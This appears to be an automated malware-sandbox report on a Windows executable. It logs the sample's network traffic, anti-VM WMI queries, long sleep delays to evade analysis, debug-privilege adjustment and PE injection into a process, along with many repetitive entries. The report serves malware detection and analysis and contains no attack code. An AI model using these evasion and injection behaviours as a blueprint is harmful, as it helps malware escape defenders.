Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49739

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: lWnSA7IyVc.exe PID: 2008, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Memory allocated: A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Memory allocated: 2530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Memory allocated: 4530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Memory allocated: 8D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Memory allocated: 9D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Memory allocated: 9F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Memory allocated: AF80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Memory allocated: 1880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Memory allocated: 32B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Memory allocated: 31E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Window / User API: threadDelayed 1909			Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Window / User API: threadDelayed 7830			Jump to behavior

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe TID: 1800	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe TID: 7208	Thread sleep time: -26747778906878833s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: lWnSA7IyVc.exe, 00000002.00000002.1868707431.0000000001470000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe

Memory written: C:\Users\user\Desktop\lWnSA7IyVc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe

Process created: C:\Users\user\Desktop\lWnSA7IyVc.exe "C:\Users\user\Desktop\lWnSA7IyVc.exe"

Jump to behavior

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Users\user\Desktop\lWnSA7IyVc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
